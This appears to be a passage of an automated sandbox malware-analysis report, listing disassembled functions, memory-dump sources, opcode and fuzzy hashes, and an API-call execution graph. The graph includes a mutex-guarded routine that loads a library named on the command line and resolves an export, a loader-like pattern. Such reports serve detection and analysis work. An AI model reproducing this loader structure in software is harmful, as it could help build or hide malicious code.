                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2933794660-0
                                                                                                                • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                                                • Instruction ID: 300e9d97a577a314a47ad2e2211157d91ddeddf12184fe1fc4cbce8b89e43a02
                                                                                                                • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                                                                • Instruction Fuzzy Hash: 35114C62B14B058AEF00DF70E8446B933B4F719758F881A31EA2D5A7A4DF38D558C340
                                                                                                                Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateEvent$CriticalInitializeSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 926662266-0
                                                                                                                • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                                                • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                                                                • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                                                                • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                                                                Function 00007FFBC3205C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __except_validate_context_record
                                                                                                                • String ID: csm$csm
                                                                                                                • API String ID: 1467352782-3733052814
                                                                                                                • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                                                • Instruction ID: 6a6fe900e328f622ca646d5f10fb0187f6ca9576bd3fd161c0433466bdc761ca
                                                                                                                • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                                                • Instruction Fuzzy Hash: ED7183B250C68186DF60AF35D484B7E7BA0FB04B84F688136DE8C6BA89CB3CD459C744
                                                                                                                Function 00007FFBC3206298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2558813199-1018135373
                                                                                                                • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                                                • Instruction ID: 7100c86260c25f067104827c3bdd9f4bcb5c84eed2f601bcd04d953338ea06f4
                                                                                                                • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                                                • Instruction Fuzzy Hash: B15162B261874196DA20FF25E080A6E77A4FB89B90F980134EB8D1BB55CF3CE465CB00
                                                                                                                Function 00007FFBC320EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID: U
                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                                                • Instruction ID: 08781e5ee7fbf188fe9f3d7044082d468bb2cdb0a6998a669b7902f3765ae6e6
                                                                                                                • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                                                • Instruction Fuzzy Hash: 4741B2B2A19A4181DF20EF75E4447AA77A0FB88794F884131EE4E9B794DF3CD445CB40
                                                                                                                Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 3997070919-1018135373
                                                                                                                • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                                                • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                                                                • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                                                • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                                                                Function 00007FFBC3210910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FFBC3203A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC3203A63
                                                                                                                • __GSHandlerCheckCommon.LIBCMT ref: 00007FFBC3210993
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckCommonHandler__except_validate_context_record
                                                                                                                • String ID: csm$f
                                                                                                                • API String ID: 1543384424-629598281
                                                                                                                • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                                                • Instruction ID: d1f53d47c39e8afceb262e2fd35fa0d2909f5c2b02845ddf3923135eccfc676f
                                                                                                                • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                                                • Instruction Fuzzy Hash: A211AF72A1878585EB50AF32E5819AAB764EB45FC4F8C8035EF882FB56CE38D851C700
                                                                                                                Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TimerWaitable
                                                                                                                • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                                                • API String ID: 1823812067-484248852
                                                                                                                • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                                                • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                                                                • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                                                • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                                                                                Function 00007FFBC3203990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC32039E0
                                                                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC3203A21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                                                • Instruction ID: 8794dc55e629af33f632151be59851f87d6bb74f3517eeb7756924e450a3536b
                                                                                                                • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                                                • Instruction Fuzzy Hash: 61115E72618B4582EB209F25E44066A77E4FB88B84F984230EFCD1BB58DF3CD555CB00
                                                                                                                Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TimerWaitable
                                                                                                                • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                                                • API String ID: 1823812067-3336177065
                                                                                                                • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                                                • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                                                                • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                                                • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                                                                Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                                                • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                                                                • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                                                • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:5.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:1.3%
                                                                                                                Total number of Nodes:1047
                                                                                                                Total number of Limit Nodes:29
                                                                                                                execution_graph 3221 841104 3258 84264c 3221->3258 3223 841110 GetStartupInfoW 3225 841133 3223->3225 3259 84261b HeapCreate 3225->3259 3229 841183 3261 84248e GetModuleHandleW 3229->3261 3230 841194 __RTC_Initialize 3295 841dde 3230->3295 3232 8410db _fast_error_exit 66 API calls 3232->3230 3234 8411a2 3235 8411ae GetCommandLineW 3234->3235 3369 841411 3234->3369 3310 841d81 GetEnvironmentStringsW 3235->3310 3239 8411bd 3319 841cd3 GetModuleFileNameW 3239->3319 3242 8411d2 3325 841aa4 3242->3325 3243 841411 __amsg_exit 66 API calls 3243->3242 3246 8411e3 3338 8414d0 3246->3338 3247 841411 __amsg_exit 66 API calls 3247->3246 3249 8411ea 3250 841411 __amsg_exit 66 API calls 3249->3250 3251 8411f5 __wwincmdln 3249->3251 3250->3251 3344 841000 CoInitialize CreateMutexW 3251->3344 3253 841216 3254 841224 3253->3254 3358 841681 3253->3358 3376 8416ad 3254->3376 3257 841229 __freefls@4 3258->3223 3260 841177 3259->3260 3260->3229 3361 8410db 3260->3361 3262 8424a2 3261->3262 3263 8424a9 3261->3263 3379 8413e1 3262->3379 3265 842611 3263->3265 3266 8424b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3263->3266 3438 8421a8 3265->3438 3268 8424fc TlsAlloc 3266->3268 3271 841189 3268->3271 3272 84254a TlsSetValue 3268->3272 3271->3230 3271->3232 3272->3271 3273 84255b 3272->3273 3383 8416cb 3273->3383 3278 84207e __encode_pointer 6 API calls 3279 84257b 3278->3279 3280 84207e __encode_pointer 6 API calls 3279->3280 3281 84258b 3280->3281 3282 84207e __encode_pointer 6 API calls 3281->3282 3283 84259b 3282->3283 3400 842924 3283->3400 3290 8420f9 __decode_pointer 6 API calls 3291 8425ef 3290->3291 3291->3265 3292 8425f6 3291->3292 3420 8421e5 3292->3420 3294 8425fe GetCurrentThreadId 3294->3271 3765 84264c 3295->3765 3297 841dea GetStartupInfoA 3298 843730 __calloc_crt 66 API calls 3297->3298 3305 841e0b 3298->3305 3299 842029 __freefls@4 3299->3234 3300 841fa6 GetStdHandle 3304 841f70 3300->3304 3301 843730 __calloc_crt 66 API calls 3301->3305 3302 84200b SetHandleCount 3302->3299 3303 841fb8 GetFileType 3303->3304 3304->3299 3304->3300 3304->3302 3304->3303 3308 84317c __ioinit InitializeCriticalSectionAndSpinCount 3304->3308 3305->3299 3305->3301 3305->3304 3306 841ef3 3305->3306 3306->3299 3306->3304 3307 841f1c GetFileType 3306->3307 3309 84317c __ioinit InitializeCriticalSectionAndSpinCount 3306->3309 3307->3306 3308->3304 3309->3306 3311 841d96 3310->3311 3312 841d92 3310->3312 3314 8436eb __malloc_crt 66 API calls 3311->3314 3312->3239 3315 841db7 3314->3315 3316 841dbe FreeEnvironmentStringsW 3315->3316 3766 8437f0 3315->3766 3316->3239 3320 841d08 _wparse_cmdline 3319->3320 3321 8411c7 3320->3321 3322 841d45 3320->3322 3321->3242 3321->3243 3323 8436eb __malloc_crt 66 API calls 3322->3323 3324 841d4b _wparse_cmdline 3323->3324 3324->3321 3326 841abc _wcslen 3325->3326 3329 8411d8 3325->3329 3327 843730 __calloc_crt 66 API calls 3326->3327 3328 841ae0 _wcslen 3327->3328 3328->3329 3330 841b45 3328->3330 3332 843730 __calloc_crt 66 API calls 3328->3332 3333 841b6b 3328->3333 3336 841b2a 3328->3336 3770 84367c 3328->3770 3329->3246 3329->3247 3331 8435ee ___free_lconv_mon 66 API calls 3330->3331 3331->3329 3332->3328 3335 8435ee ___free_lconv_mon 66 API calls 3333->3335 3335->3329 3336->3328 3337 842ae2 __invoke_watson 10 API calls 3336->3337 3337->3336 3339 8414de __IsNonwritableInCurrentImage 3338->3339 3779 842dc3 3339->3779 3341 8414fc __initterm_e 3343 84151b __IsNonwritableInCurrentImage __initterm 3341->3343 3783 842dac 3341->3783 3343->3249 3345 841035 GetCommandLineW CommandLineToArgvW 3344->3345 3346 84101f GetLastError 3344->3346 3348 841056 PathFileExistsW 3345->3348 3351 841067 3345->3351 3346->3345 3347 84102c 3346->3347 3347->3253 3350 84106e PathFileExistsW 3348->3350 3348->3351 3349 841084 LoadLibraryW 3352 841091 GetProcAddress 3349->3352 3353 8410aa CloseHandle CoUninitialize 3349->3353 3350->3349 3350->3351 3351->3349 3354 8410a1 3352->3354 3355 8410a3 FreeLibrary 3352->3355 3356 8410c2 3353->3356 3357 8410bb LocalFree 3353->3357 3354->3355 3355->3353 3356->3253 3357->3356 3884 841555 3358->3884 3360 841692 3360->3254 3362 8410ee 3361->3362 3363 8410e9 3361->3363 3365 841719 __NMSG_WRITE 66 API calls 3362->3365 3364 8418c4 __FF_MSGBANNER 66 API calls 3363->3364 3364->3362 3366 8410f6 3365->3366 3367 841465 _fast_error_exit 3 API calls 3366->3367 3368 841100 3367->3368 3368->3229 3370 8418c4 __FF_MSGBANNER 66 API calls 3369->3370 3371 84141b 3370->3371 3372 841719 __NMSG_WRITE 66 API calls 3371->3372 3373 841423 3372->3373 3374 8420f9 __decode_pointer 6 API calls 3373->3374 3375 8411ad 3374->3375 3375->3235 3377 841555 _doexit 66 API calls 3376->3377 3378 8416b8 3377->3378 3378->3257 3380 8413ec Sleep GetModuleHandleW 3379->3380 3381 84140e 3380->3381 3382 84140a 3380->3382 3381->3263 3382->3380 3382->3381 3449 8420f0 3383->3449 3385 8416d3 __init_pointers __initp_misc_winsig 3452 842913 3385->3452 3388 84207e __encode_pointer 6 API calls 3389 84170f 3388->3389 3390 84207e TlsGetValue 3389->3390 3391 842096 3390->3391 3392 8420b7 GetModuleHandleW 3390->3392 3391->3392 3393 8420a0 TlsGetValue 3391->3393 3394 8420c7 3392->3394 3395 8420d2 GetProcAddress 3392->3395 3399 8420ab 3393->3399 3396 8413e1 __crt_waiting_on_module_handle 2 API calls 3394->3396 3397 8420af 3395->3397 3398 8420cd 3396->3398 3397->3278 3398->3395 3398->3397 3399->3392 3399->3397 3401 84292f 3400->3401 3403 8425a8 3401->3403 3455 84317c 3401->3455 3403->3265 3404 8420f9 TlsGetValue 3403->3404 3405 842111 3404->3405 3406 842132 GetModuleHandleW 3404->3406 3405->3406 3407 84211b TlsGetValue 3405->3407 3408 842142 3406->3408 3409 84214d GetProcAddress 3406->3409 3412 842126 3407->3412 3410 8413e1 __crt_waiting_on_module_handle 2 API calls 3408->3410 3411 84212a 3409->3411 3413 842148 3410->3413 3411->3265 3414 843730 3411->3414 3412->3406 3412->3411 3413->3409 3413->3411 3417 843739 3414->3417 3416 8425d5 3416->3265 3416->3290 3417->3416 3418 843757 Sleep 3417->3418 3460 84557f 3417->3460 3419 84376c 3418->3419 3419->3416 3419->3417 3744 84264c 3420->3744 3422 8421f1 GetModuleHandleW 3423 842201 3422->3423 3424 842207 3422->3424 3425 8413e1 __crt_waiting_on_module_handle 2 API calls 3423->3425 3426 842243 3424->3426 3427 84221f GetProcAddress GetProcAddress 3424->3427 3425->3424 3428 842aa0 __lock 62 API calls 3426->3428 3427->3426 3429 842262 InterlockedIncrement 3428->3429 3745 8422ba 3429->3745 3432 842aa0 __lock 62 API calls 3433 842283 3432->3433 3748 843c9e InterlockedIncrement 3433->3748 3435 8422a1 3760 8422c3 3435->3760 3437 8422ae __freefls@4 3437->3294 3439 8421b2 3438->3439 3440 8421be 3438->3440 3442 8420f9 __decode_pointer 6 API calls 3439->3442 3441 8421d2 TlsFree 3440->3441 3443 8421e0 3440->3443 3441->3443 3442->3440 3444 84298b DeleteCriticalSection 3443->3444 3445 8429a3 3443->3445 3446 8435ee ___free_lconv_mon 66 API calls 3444->3446 3447 8429b5 DeleteCriticalSection 3445->3447 3448 8429c3 3445->3448 3446->3443 3447->3445 3448->3271 3450 84207e __encode_pointer 6 API calls 3449->3450 3451 8420f7 3450->3451 3451->3385 3453 84207e __encode_pointer 6 API calls 3452->3453 3454 841705 3453->3454 3454->3388 3459 84264c 3455->3459 3457 843188 InitializeCriticalSectionAndSpinCount 3458 8431cc __freefls@4 3457->3458 3458->3401 3459->3457 3461 84558b __freefls@4 3460->3461 3462 8455a3 3461->3462 3472 8455c2 __setmbcp_nolock 3461->3472 3473 842c72 3462->3473 3466 845634 HeapAlloc 3466->3472 3469 8455b8 __freefls@4 3469->3417 3472->3466 3472->3469 3479 842aa0 3472->3479 3486 844dc3 3472->3486 3492 84567b 3472->3492 3495 8431eb 3472->3495 3498 8422cc GetLastError 3473->3498 3475 842c77 3476 842c0a 3475->3476 3477 8420f9 __decode_pointer 6 API calls 3476->3477 3478 842c1a __invoke_watson 3477->3478 3480 842ab5 3479->3480 3481 842ac8 EnterCriticalSection 3479->3481 3540 8429dd 3480->3540 3481->3472 3483 842abb 3483->3481 3484 841411 __amsg_exit 65 API calls 3483->3484 3485 842ac7 3484->3485 3485->3481 3487 844df1 3486->3487 3489 844e93 3487->3489 3491 844e8a 3487->3491 3732 84492a 3487->3732 3489->3472 3491->3489 3739 8449da 3491->3739 3743 8429c6 LeaveCriticalSection 3492->3743 3494 845682 3494->3472 3496 8420f9 __decode_pointer 6 API calls 3495->3496 3497 8431fb 3496->3497 3497->3472 3512 842174 TlsGetValue 3498->3512 3500 842339 SetLastError 3500->3475 3502 843730 __calloc_crt 63 API calls 3503 8422f7 3502->3503 3503->3500 3504 8420f9 __decode_pointer 6 API calls 3503->3504 3505 842311 3504->3505 3506 842330 3505->3506 3507 842318 3505->3507 3517 8435ee 3506->3517 3508 8421e5 __getptd_noexit 63 API calls 3507->3508 3510 842320 GetCurrentThreadId 3508->3510 3510->3500 3511 842336 3511->3500 3513 8421a4 3512->3513 3514 842189 3512->3514 3513->3500 3513->3502 3515 8420f9 __decode_pointer 6 API calls 3514->3515 3516 842194 TlsSetValue 3515->3516 3516->3513 3519 8435fa __freefls@4 3517->3519 3518 843673 _realloc __freefls@4 3518->3511 3519->3518 3521 842aa0 __lock 64 API calls 3519->3521 3529 843639 3519->3529 3520 84364e HeapFree 3520->3518 3522 843660 3520->3522 3525 843611 ___sbh_find_block 3521->3525 3523 842c72 strtoxl 64 API calls 3522->3523 3524 843665 GetLastError 3523->3524 3524->3518 3526 84362b 3525->3526 3530 844614 3525->3530 3536 843644 3526->3536 3529->3518 3529->3520 3531 844653 3530->3531 3535 8448f5 ___sbh_free_block 3530->3535 3532 84483f VirtualFree 3531->3532 3531->3535 3533 8448a3 3532->3533 3534 8448b2 VirtualFree HeapFree 3533->3534 3533->3535 3534->3535 3535->3526 3539 8429c6 LeaveCriticalSection 3536->3539 3538 84364b 3538->3529 3539->3538 3541 8429e9 __freefls@4 3540->3541 3542 842a0f 3541->3542 3566 8418c4 3541->3566 3548 842a1f __freefls@4 3542->3548 3612 8436eb 3542->3612 3548->3483 3550 842a40 3552 842aa0 __lock 66 API calls 3550->3552 3551 842a31 3554 842c72 strtoxl 66 API calls 3551->3554 3555 842a47 3552->3555 3554->3548 3556 842a4f 3555->3556 3557 842a7b 3555->3557 3558 84317c __ioinit InitializeCriticalSectionAndSpinCount 3556->3558 3559 8435ee ___free_lconv_mon 66 API calls 3557->3559 3560 842a5a 3558->3560 3561 842a6c 3559->3561 3560->3561 3563 8435ee ___free_lconv_mon 66 API calls 3560->3563 3617 842a97 3561->3617 3564 842a66 3563->3564 3565 842c72 strtoxl 66 API calls 3564->3565 3565->3561 3620 8435a3 3566->3620 3569 841719 __NMSG_WRITE 66 API calls 3571 8418f0 3569->3571 3570 8435a3 __set_error_mode 66 API calls 3572 8418d8 3570->3572 3573 841719 __NMSG_WRITE 66 API calls 3571->3573 3572->3569 3574 8418fa 3572->3574 3573->3574 3575 841719 3574->3575 3576 84172d 3575->3576 3577 841888 3576->3577 3578 8435a3 __set_error_mode 63 API calls 3576->3578 3609 841465 3577->3609 3579 84174f 3578->3579 3580 84188d GetStdHandle 3579->3580 3582 8435a3 __set_error_mode 63 API calls 3579->3582 3580->3577 3581 84189b _strlen 3580->3581 3581->3577 3585 8418b4 WriteFile 3581->3585 3583 841760 3582->3583 3583->3580 3584 841772 3583->3584 3584->3577 3626 84353b 3584->3626 3585->3577 3588 8417a8 GetModuleFileNameA 